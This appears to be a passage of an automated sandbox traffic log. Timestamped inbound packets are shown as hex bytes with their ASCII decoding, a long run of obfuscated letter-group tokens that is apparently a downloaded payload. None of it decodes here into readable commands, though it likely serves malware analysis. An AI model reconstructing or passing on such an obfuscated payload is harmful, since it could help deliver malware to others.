                                                  2021-10-29 18:29:53 UTC1303INData Raw: 63 57 20 56 72 49 20 59 43 20 72 49 20 59 56 20 72 49 20 4c 57 20 56 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 57 20 59 63 20 59 4e 20 59 72 20 49 43 20 57 43 20 56 72 43 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 72 20 56 43 72 20 72 49 20 49 56 20 4e 4e 56 20 4e 4e 4d 20 4e 43 4d 20 4c 20 4e 59 4e 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 57 49 20 4e 4e 4d 20 4e 43 57 20 57 4e 20 56 63 20 4c 4c 20 59 43 20 59 72 20 4e 56 4d 20 57 43 20 56 72 4c 20 4e 43 57 20 4e 4e 56 20 59 56 20 56 72 20 4e 49 4e 20 59 72 20 49 72 20 4e 4e 63 20 4e 4e 59 20 4e 72 4d 20 4e 4e 49 20 59 4c 20 59 43 20 59 43 20 72 49 20 4c 57 20 56 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 4c 56 20 59 43 20 59 72 20 4e 56 4d 20 57 43 20 4e 43 43 20 4e 43 57 20 4e 4e 56 20 56
                                                  Data Ascii: cW VrI YC rI YV rI LW VNr NNM NCW NVV MW Yc YN Yr IC WC VrC NCW NNV YV Yr VCr rI IV NNV NNM NCM L NYN rI YC cC NVr WI NNM NCW WN Vc LL YC Yr NVM WC VrL NCW NNV YV Vr NIN Yr Ir NNc NNY NrM NNI YL YC YC rI LW VNY NNM NCW NVV Vc LV YC Yr NVM WC NCC NCW NNV V
                                                  2021-10-29 18:29:53 UTC1304INData Raw: 56 4e 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 57 4d 20 59 43 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 56 56 20 72 49 20 59 43 20 59 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 59 72 20 59 43 20 72 49 20 59 43 20 63 4e 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 59 59 20 4e 4e 56 20 59 43 20 72 49 20 72 57 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 56 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 72 4d 20 72 57 20 59 43 20 59 72 20 4d 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 72 49 20 59 43 20 4e 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72
                                                  Data Ascii: VNc Yr Ir NNr NVc NCW NNV YC NWM YC Yr Ir NNY NNM NCW NNV VV rI YC YY Ir NNr NNM NCW NYr YC rI YC cN Ir NNr NNM NYY NNV YC rI rW Yr Ir NNr NVV NCW NNV YN rI YC Yr Ir NNr NNM NCW NNV rM rW YC Yr ML NNY NNM NCW NNL YC rI YC NI Ir NNr NNc NCW NNV YC rI YC Yr
                                                  2021-10-29 18:29:53 UTC1306INData Raw: 20 56 72 20 4e 4c 59 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 56 4e 57 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 56 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 56 43 4e 20 59 4e 20 72 49 20 59 56 20 59 43 20 4e 56 72 20 4e 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 63 20 4e 4c 59 20 59 4e 20 59 72 20 49 56 20 49 49 20 4e 43 56 20 57 4c 20 4e 56 72 20 59 43 20 4e 63 63 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 72 20 4d 49 20 59 63 20 59 59 20 49 72 20 4e 4e 49 20 49 49 20 4d 4c 20 4e 43 56 20 56 56 63 20 4e 43 72 20 59 43 20 59 72 20 49 59 20 57 43 20 56 43 59 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 56 72 20 63 4c 20 59 72 20 49 72 20 4e 4e 56 20 57 4c 20 56 4e 4c 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20
                                                  Data Ascii: Vr NLY Yr Ir NVC Vc VNW NNV YC YI WL NVW Ir NNr NVM cW VCN YN rI YV YC NVr NrI NNM NCW NNI Vc NLY YN Yr IV II NCV WL NVr YC Ncc YC Yr Ir NNr NNM NCW NNV Yr MI Yc YY Ir NNI II ML NCV VVc NCr YC Yr IY WC VCY NCW NNV Yc VVr cL Yr Ir NNV WL VNL NNV YC YI Vc
                                                  2021-10-29 18:29:53 UTC1307INData Raw: 20 49 43 20 57 43 20 4e 72 72 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 59 20 4e 63 56 20 59 59 20 49 72 20 4e 4e 63 20 4e 43 43 20 4e 43 59 20 4c 4e 20 56 72 72 20 72 49 20 59 43 20 63 43 20 49 43 20 57 43 20 56 43 4e 20 4e 43 49 20 4e 4e 56 20 59 56 20 59 72 20 57 4c 20 63 4d 20 49 59 20 4e 4e 72 20 4e 4e 59 20 4d 4e 20 4e 4e 56 20 59 43 20 72 57 20 72 63 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 56 72 20 4e 4e 56 20 72 63 20 56 57 20 59 43 20 59 63 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 4e 49 20 59 43 20 72 56 20 59 72 20 4e 4e 72 20 4e 56 4c 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 4e 63 20 59 43 20 4e 56 72 20 56 43 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 56 63 20 56 4c 49 20 59 43 20 59 72 20 49 56 20 56
                                                  Data Ascii: IC WC Nrr NCW NNV YV WY NcV YY Ir NNc NCC NCY LN Vrr rI YC cC IC WC VCN NCI NNV YV Yr WL cM IY NNr NNY MN NNV YC rW rc Yr Ir NNV NNM NVr NNV rc VW YC Yc Ir NNr NNM NCW NNr YC NNI YC rV Yr NNr NVL NCW NNV YC rI NNc YC NVr VCc NNc NCW NNI Vc VLI YC Yr IV V
                                                  2021-10-29 18:29:53 UTC1308INData Raw: 72 20 49 56 20 56 57 20 56 56 59 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 43 20 4e 57 4e 20 56 57 20 49 72 20 4e 4e 72 20 4e 4e 57 20 4d 56 20 4e 43 56 20 63 59 20 4e 63 4c 20 59 43 20 59 72 20 49 56 20 56 43 49 20 49 43 20 4e 56 56 20 4e 4e 49 20 4e 72 72 20 56 72 20 4e 57 4e 20 59 72 20 49 72 20 4e 4e 63 20 4e 56 63 20 4e 43 63 20 4e 4e 59 20 57 4c 20 49 57 20 59 4e 20 59 72 20 49 56 20 57 43 20 56 72 57 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 59 20 56 72 49 20 59 72 20 49 72 20 4e 56 43 20 4e 4e 4c 20 63 57 20 56 43 72 20 59 4e 20 72 49 20 59 56 20 72 57 20 59 57 20 56 72 4c 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 56 72 20 4e 63 63 20 72 57 20 49 57 20 59 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 56 20 72 63 20 59 56 20 56 63 20 4e 4c 49 20 49 59 20 4e
                                                  Data Ascii: r IV VW VVY NCW NNV YV rC NWN VW Ir NNr NNW MV NCV cY NcL YC Yr IV VCI IC NVV NNI Nrr Vr NWN Yr Ir NNc NVc NCc NNY WL IW YN Yr IV WC VrW NCW NNV YV WY VrI Yr Ir NVC NNL cW VCr YN rI YV rW YW VrL NNc NCW NNI Vr Ncc rW IW YL NNY NNM NCM WV rc YV Vc NLI IY N
                                                  2021-10-29 18:29:53 UTC1312INData Raw: 72 20 4e 56 43 20 49 57 20 4e 43 72 20 4e 43 4c 20 4c 4c 20 59 72 20 56 59 20 63 4c 20 4d 43 20 4e 56 56 20 57 4c 20 49 49 20 4e 4e 56 20 59 43 20 59 49 20 4c 4e 20 56 4c 56 20 4e 4c 49 20 4e 56 72 20 4e 43 4c 20 4e 43 4e 20 4e 72 56 20 4c 63 20 59 63 20 59 43 20 59 72 20 4d 57 20 56 57 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 4c 63 20 4c 59 20 72 49 20 4e 4e 43 20 4e 4d 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4c 4c 20 59 59 20 63 57 20 72 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 57 20 59 63 20 4c 4c 20 59 63 20 49 57 20 4e 4c 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 57 20 59 4c 20 4c 49 20 4c 4c 20 63 4e 20 63 63 20 57 4d 20 4e 56 4e 20 4d 43 20 59 4d 20 4c 59 20 59 57 20 4c 4e 20 4e 56 4c 20 63 63 20 57 4d 20 4e 56 43 20 4d
                                                  Data Ascii: r NVC IW NCr NCL LL Yr VY cL MC NVV WL II NNV YC YI LN VLV NLI NVr NCL NCN NrV Lc Yc YC Yr MW VW NVc NCW NNV Yc VLc LY rI NNC NMc NNM NCW NNV YC LL YY cW rI NNr NNM NCL WW Yc LL Yc IW NLY NNr NNM NCL WW YL LI LL cN cc WM NVN MC YM LY YW LN NVL cc WM NVC M
                                                  2021-10-29 18:29:53 UTC1316INData Raw: 20 4e 4e 4d 20 4e 43 57 20 4e 4d 57 20 72 49 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 72 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 72 4c 20 72 49 20 59 72 20 49 72 20 4e 63 4e 20 4e 4e 57 20 4e 43 57 20 4e 4e 56 20 59 63 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 72 49 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 49 43 20 4e 4e 72 20 59 43 20 72 49 20 56 4c 4d 20 59 56 20 49 72 20 4e 4e 72 20 4e 4e 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 59 20 4e 4e 56 20 4e 56 4c 20 72 57 20 59 43 20 59 72 20 4e 56 63 20 4e 4e 72 20 4e 4e 4d 20
                                                  Data Ascii: NNM NCW NMW rI rI YC YL Ir NNr NNM WI NNV YC rW rI Yr Ir NNr NCN NCW NNV YC VrL rI Yr Ir NcN NNW NCW NNV Yc rI YC Yr Ir NNr NNM NCW NNV YC rI YC rI Ir NNr NNM NIC NNr YC rI VLM YV Ir NNr NNI NCW NNV YC YI YC Yr IY NCY cW NCY NNV NVL rW YC Yr NVc NNr NNM
                                                  2021-10-29 18:29:53 UTC1317INData Raw: 56 43 20 4e 63 57 20 4e 56 72 20 4e 4e 4d 20 4c 4e 20 4c 56 20 59 4c 20 4c 57 20 49 43 20 4e 4e 4c 20 4e 4e 4c 20 63 57 20 56 56 72 20 59 43 20 72 49 20 59 56 20 4c 43 20 63 63 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 4e 56 4c 20 59 57 20 57 59 20 63 56 20 59 72 20 49 72 20 4e 56 43 20 49 49 20 56 59 59 20 4e 4d 72 20 59 63 20 59 4d 20 4c 43 20 72 49 20 57 4c 20 56 57 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 4c 63 20 56 4c 63 20 59 4c 20 4e 4e 72 20 4e 4d 56 20 4e 4e 4d 20 4e 43 59 20 57 57 20 59 49 20 4c 49 20 4c 4c 20 63 4c 20 4e 56 4d 20 49 4c 20 4e 43 43 20 4e 43 4e 20 57 4d 20 59 57 20 4e 4d 43 20 4c 4c 20 63 43 20 49 4c 20 4e 4e 56 20 4e 43 43 20 4e 43 4c 20 49 49 20 56 4c 4c 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 43 20 4e 4e 4d 20 4e
                                                  Data Ascii: VC NcW NVr NNM LN LV YL LW IC NNL NNL cW VVr YC rI YV LC cc NNr NNM MC NVL YW WY cV Yr Ir NVC II VYY NMr Yc YM LC rI WL VW NVc NCW NNV Yc VLc VLc YL NNr NMV NNM NCY WW YI LI LL cL NVM IL NCC NCN WM YW NMC LL cC IL NNV NCC NCL II VLL rI YC cC NVr NCC NNM N
                                                  2021-10-29 18:29:53 UTC1322INData Raw: 56 20 59 63 20 63 4e 20 4d 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 56 63 20 4e 4e 63 20 4d 63 20 72 63 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 4e 56 20 4e 43 43 20 4c 20 4e 63 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 49 4e 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 56 43 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 4e 4c 20 4e 56 72 20 4e 4e 63 20 72 59 20 63 4c 20 4e 57 4e 20 4e 43 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4d 56 20 4e 63 43 20 56 4e 59 20 72 49 20 59 43 20 59 43 20 4e 56 72 20 63 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 56 57 20 49 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 49 20 72 43 20 72 43 20 56 4e 4d 20 72 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 56 4c 20 56 56 72 20 56 59 59
                                                  Data Ascii: V Yc cN Mc rC Ir NNr NVM NVc NNc Mc rc YC Yr Wr WM NNV NCC L Nc rI YC cC NVr IN NNM NCW NVV WL VC YC Yr Wr WM NNL NVr NNc rY cL NWN NCI Ir NNr NNc MV NcC VNY rI YC YC NVr cW NNM NCW NVV cY I YC Yr Wr VW IC NCW NNV Yc VI rC rC VNM rC NNM NCW NNL VL VVr VYY
                                                  2021-10-29 18:29:53 UTC1326INData Raw: 4e 4c 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 63 20 4e 4e 57 20 49 49 20 57 63 20 72 49 20 59 43 20 63 43 20 4d 59 20 4e 43 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 56 4c 43 20 4e 4c 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 49 49 20 59 20 72 49 20 59 43 20 63 43 20 4c 57 20 4d 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 56 4d 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 56 59 20 4e 43 4d 20 4c 20 4e 57 57 20 72 49 20 59 43 20 72 49 20 4d 4e 20 4e 4e 49 20 4e 43 43 20 4e 43 59 20 57 49 20 59 4e 20 56 72 20 56 4e 57 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 4c 4e 20 4e 4e 56 20 59 43 20 59 72 20 4c 59 20 59 43 20 63 4d 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 4c 63 20 72 4e 20 4e 56 63 20 56 4c 57 20
                                                  Data Ascii: NL Yr Ir NNr NCc NNW II Wc rI YC cC MY NCN VrI YY NNV YC rW VL VLC NLC NNr NNM NCY II Y rI YC cC LW Mr NNM NCW NVV Vc VM YC Yr Wr WM NVY NCM L NWW rI YC rI MN NNI NCC NCY WI YN Vr VNW Yr Ir NVC Vc NLN NNV YC Yr LY YC cM VYY rM NCW NNV YN VN Lc rN NVc VLW
                                                  2021-10-29 18:29:53 UTC1330INData Raw: 20 59 4d 20 59 43 20 4d 43 20 4e 56 72 20 4e 4d 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 72 20 4e 4e 57 20 59 63 20 59 72 20 4c 63 20 4e 56 20 4e 43 4d 20 4e 43 57 20 4e 4e 56 20 59 63 20 57 59 20 72 59 20 59 72 20 49 72 20 4e 56 43 20 4d 20 4e 63 20 4e 56 56 20 59 43 20 63 72 20 63 72 20 4e 59 59 20 57 72 20 4e 4e 72 20 59 20 4e 57 20 4e 4e 43 20 59 43 20 72 49 20 59 63 20 4c 43 20 4d 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 49 49 20 4e 4e 20 72 49 20 59 43 20 63 43 20 59 57 20 4e 4c 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 4c 20 63 63 20 4e 72 4c 20 63 43 20 49 72 20 56 20 4d 20 4e 56 72 20 4e 56 4c 20 59 43 20 63 72 20 4d 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 4e 4e 4e 20 59 43 20 72 49 20 59 63 20 4c 43 20 4d 63 20 4e 4e 72 20
                                                  Data Ascii: YM YC MC NVr NM NNM NCW NVV cr NNW Yc Yr Lc NV NCM NCW NNV Yc WY rY Yr Ir NVC M Nc NVV YC cr cr NYY Wr NNr Y NW NNC YC rI Yc LC MY NNr NNM NCL II NN rI YC cC YW NLC NNM NCW NNI VL cc NrL cC Ir V M NVr NVL YC cr Mc rC Ir NNr NVM cW NNN YC rI Yc LC Mc NNr
                                                  2021-10-29 18:29:53 UTC1334INData Raw: 20 56 49 20 72 49 20 59 43 20 59 56 20 72 4d 20 49 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 57 4e 20 57 59 20 4e 57 56 20 59 72 20 49 72 20 4e 56 43 20 56 4e 59 20 49 59 20 56 56 63 20 59 43 20 72 49 20 59 43 20 59 56 20 72 4d 20 4e 43 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 59 4c 20 59 63 20 4e 43 63 20 4e 49 59 20 4e 43 43 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 4e 4e 20 56 4d 20 72 49 20 59 43 20 59 43 20 63 57 20 4e 56 59 20 4e 43 63 20 57 4d 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 4c 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 49 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4e 4e 20 4c 72 20 72 49 20 59 43 20
                                                  Data Ascii: VI rI YC YV rM Ic NNM NCW NNc WN WY NWV Yr Ir NVC VNY IY VVc YC rI YC YV rM NCV NNM NCW NNc YL Yc NCc NIY NCC NNr NNM NNN NN VM rI YC YC cW NVY NCc WM VYL NCr rI YC YY NNL NcV NLY NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI Vc II Ir NNr NVM NNN NN Lr rI YC
                                                  2021-10-29 18:29:53 UTC1338INData Raw: 57 4c 20 57 43 20 4e 4e 56 20 59 43 20 59 49 20 63 59 20 4e 72 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 4c 43 20 59 43 20 72 49 20 59 63 20 59 56 20 72 4d 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 4c 59 20 59 49 20 4c 59 20 59 57 20 4e 56 20 57 57 20 4e 56 4c 20 4e 56 4c 20 56 4c 43 20 4e 43 63 20 4c 4c 20 63 43 20 4c 4c 20 4e 57 72 20 72 56 20 4e 43 43 20 57 57 20 4e 43 72 20 4e 63 72 20 4e 43 72 20 4c 59 20 59 63 20 4d 4d 20 56 56 49 20 72 59 20 72 20 57 4d 20 63 43 20 72 56 20 4e 63 72 20 57 59 20 59 57 20 4e 56 49 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 57 20 56 72 20 59 43 20 59 72 20 49 43 20 4d 72 20 56 4c 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 43 20 4d 4c 20 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4e 4e 4d 20 56 63 20 4e 20 4e 4e
                                                  Data Ascii: WL WC NNV YC YI cY Nr Ir NNr NVM cW LC YC rI Yc YV rM WI NNM NCW NNc LY YI LY YW NV WW NVL NVL VLC NCc LL cC LL NWr rV NCC WW NCr Ncr NCr LY Yc MM VVI rY r WM cC rV Ncr WY YW NVI NNM NCW NVV MW Vr YC Yr IC Mr VLY NCW NNV YC YC ML YM Ir NNr NNL NNM Vc N NN
                                                  2021-10-29 18:29:53 UTC1342INData Raw: 20 56 63 20 49 56 20 59 43 20 59 72 20 57 72 20 49 49 20 57 57 20 4e 4e 43 20 4e 43 72 20 56 43 72 20 72 57 20 56 72 20 59 72 20 49 72 20 4e 43 59 20 63 57 20 4e 43 72 20 4e 4e 56 20 63 4d 20 72 49 20 59 43 20 59 72 20 4e 4e 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4e 4e 59 20 57 4c 20 4e 59 4c 20 59 4e 20 59 72 20 49 56 20 4e 43 4e 20 56 72 49 20 59 4c 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 4c 56 20 4c 49 20 4e 4d 56 20 4e 4e 72 20 4e 43 57 20 43 20 4e 72 72 20 4c 57 20 57 4c 20 4e 56 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 4c 20 4c 20 59 4e 20 72 57 20 59 43 20 63 43 20 49 56 20 4e 43 43 20 56 4c 57 20 4e 43 4d 20 4e 43 4c 20 4e 63 49 20 56 72 20 49 4e 20 59 72 20 49 72 20 4e 56 43 20 57 4c 20 4e 4e 4e 20 4e 4e 4c 20 59 43 20 59 49 20 63 59 20
                                                  Data Ascii: Vc IV YC Yr Wr II WW NNC NCr VCr rW Vr Yr Ir NCY cW NCr NNV cM rI YC Yr NNN NNr NNM NVr NNY WL NYL YN Yr IV NCN VrI YL NNV YC rW VL LV LI NMV NNr NCW C Nrr LW WL NVC Ir NNr NVM NCL L YN rW YC cC IV NCC VLW NCM NCL NcI Vr IN Yr Ir NVC WL NNN NNL YC YI cY
                                                  2021-10-29 18:29:53 UTC1346INData Raw: 4e 63 20 4d 43 20 4e 4e 56 20 4e 4c 57 20 4e 56 43 20 63 4d 20 59 43 20 72 49 20 72 4e 20 63 56 20 4e 56 4d 20 59 57 20 4e 4e 20 4e 56 4c 20 4e 4e 4c 20 59 43 20 59 56 20 56 4c 20 56 4d 20 63 4d 20 49 72 20 4e 4e 20 4e 56 4e 20 4e 4e 4c 20 59 43 20 59 56 20 56 43 72 20 72 49 20 4d 56 20 4e 4e 56 20 4e 4e 4d 20 4e 43 4d 20 4c 20 72 4e 20 72 57 20 59 43 20 63 43 20 4e 4e 4c 20 56 72 56 20 57 57 20 4e 43 49 20 4e 4e 56 20 59 72 20 56 72 20 72 59 20 59 72 20 49 72 20 49 57 20 49 43 20 63 72 20 4e 56 72 20 56 43 20 4c 72 20 72 49 20 56 43 43 20 63 59 20 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 43 4d 20 59 49 20 56 4d 20 4c 63 20 72 49 20 4e 4d 43 20 4e 4e 63 20 4e 43 57 20 4e 4e 4e 20 4e 4e 56 20 59 56 20 63 4d 20 72 4d 20 59 59 20 49 72 20 4e 56 43 20 57 4c 20 4d
                                                  Data Ascii: Nc MC NNV NLW NVC cM YC rI rN cV NVM YW NN NVL NNL YC YV VL VM cM Ir NN NVN NNL YC YV VCr rI MV NNV NNM NCM L rN rW YC cC NNL VrV WW NCI NNV Yr Vr rY Yr Ir IW IC cr NVr VC Lr rI VCC cY cY NNM NCW NCM YI VM Lc rI NMC NNc NCW NNN NNV YV cM rM YY Ir NVC WL M
                                                  2021-10-29 18:29:53 UTC1349INData Raw: 4e 72 20 4e 56 4d 20 56 43 4d 20 49 59 20 4c 4d 20 4c 57 20 4c 49 20 4c 43 20 56 4c 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 56 4e 43 20 56 4c 20 72 43 20 4c 4d 20 4c 72 20 4e 56 72 20 56 43 63 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4e 72 72 20 56 4e 20 72 4c 20 4c 56 20 63 72 20 57 43 20 56 43 4e 20 4e 43 57 20 4e 4e 56 20 59 63 20 4e 72 63 20 56 63 20 4e 4c 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 72 57 20 59 4e 20 72 49 20 59 63 20 4e 49 56 20 4d 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 59 20 4e 72 20 72 4d 20 72 57 20 59 43 20 59 43 20 72 4d 20 72 49 20 4e 4e 63 20 4e 43 57 20 4e 56 56 20 4d 63 20 72 59 20 59 4e 20 59 72 20 49 43 20 4e 56 56 20 57 57 20 4e 56 4c 20 4c 20 4e 4e 4c 20 72 57 20 59 43 20 63 43 20 63 63 20 4e 43 43 20 63 20 72 63 20 4e
                                                  Data Ascii: Nr NVM VCM IY LM LW LI LC VLV NNr NNM NCL VNC VL rC LM Lr NVr VCc NNM NCW NVV Nrr VN rL LV cr WC VCN NCW NNV Yc Nrc Vc NLW Ir NNr NVM cW rW YN rI Yc NIV ML NNY NNM NCY Nr rM rW YC YC rM rI NNc NCW NVV Mc rY YN Yr IC NVV WW NVL L NNL rW YC cC cc NCC c rc N
                                                  2021-10-29 18:29:53 UTC1354INData Raw: 20 4d 4d 20 72 49 20 72 57 20 63 43 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 4e 4e 20 4e 4e 56 20 56 49 20 72 49 20 4e 43 49 20 4e 49 63 20 49 72 20 4e 56 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 43 20 59 43 20 4e 4d 20 49 72 20 4c 20 56 4c 4d 20 4e 43 57 20 4e 56 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 63 20 4e 4e 72 20 49 59 20 4e 43 57 20 56 72 72 20 4e 59 43 20 72 49 20 59 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 4e 59 56 20 4e 4c 72 20 49 72 20 4e 4e 4c 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 4c 20 56 20 59 4e 20 49 72 20 4e 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 56 4e 20 72 49 20 59 43 20 4c 57 20 4c 57 20 56 4e 63 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 59 63 20 63
                                                  Data Ascii: MM rI rW cC Ir NNr NNc NNN NNV VI rI NCI NIc Ir NVC NNM NCW NNV YC YC YC NM Ir L VLM NCW NVV YC rI YC Yr Ic NNr IY NCW Vrr NYC rI Yc Yr Ir NNr NNM NCW NNV YV rI NYV NLr Ir NNL NVM NCW NNV YN rL V YN Ir NcY NNM NCW NNV NVN rI YC LW LW VNc NNM NCW NVV Yc c
                                                  2021-10-29 18:29:53 UTC1358INData Raw: 4e 4e 72 20 59 43 20 72 49 20 59 43 20 4e 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 63 72 20 4e 4e 4c 20 59 43 20 72 49 20 49 72 20 59 59 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 59 43 20 59 72 20 59 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 56 20 59 4e 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 4e 56 20 59 43 20 72 57 20 72 4e 20 63 20 49 4e 20 4e 4e 72 20 56 72 43 20 4e 4e 4e 20 4e 4e 56 20 59 43 20 4e 56 4d 20 59 43 20 59 72 20 63 57 20 4e 20 56 4e 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 49 20 4e 49 20 4e 49 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e
                                                  Data Ascii: NNr YC rI YC NY Ir NNr NNM cr NNL YC rI Ir YY Ir NNr NVM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YV rI YC Yr Yc NNY NNM NCW V YN rI YC YL Ir NNr NNM NCL NNV YC rW rN c IN NNr VrC NNN NNV YC NVM YC Yr cW N VNC NCW NNV Yc YI NI NIM Ir NNr NNM VVr rV YC rI YN
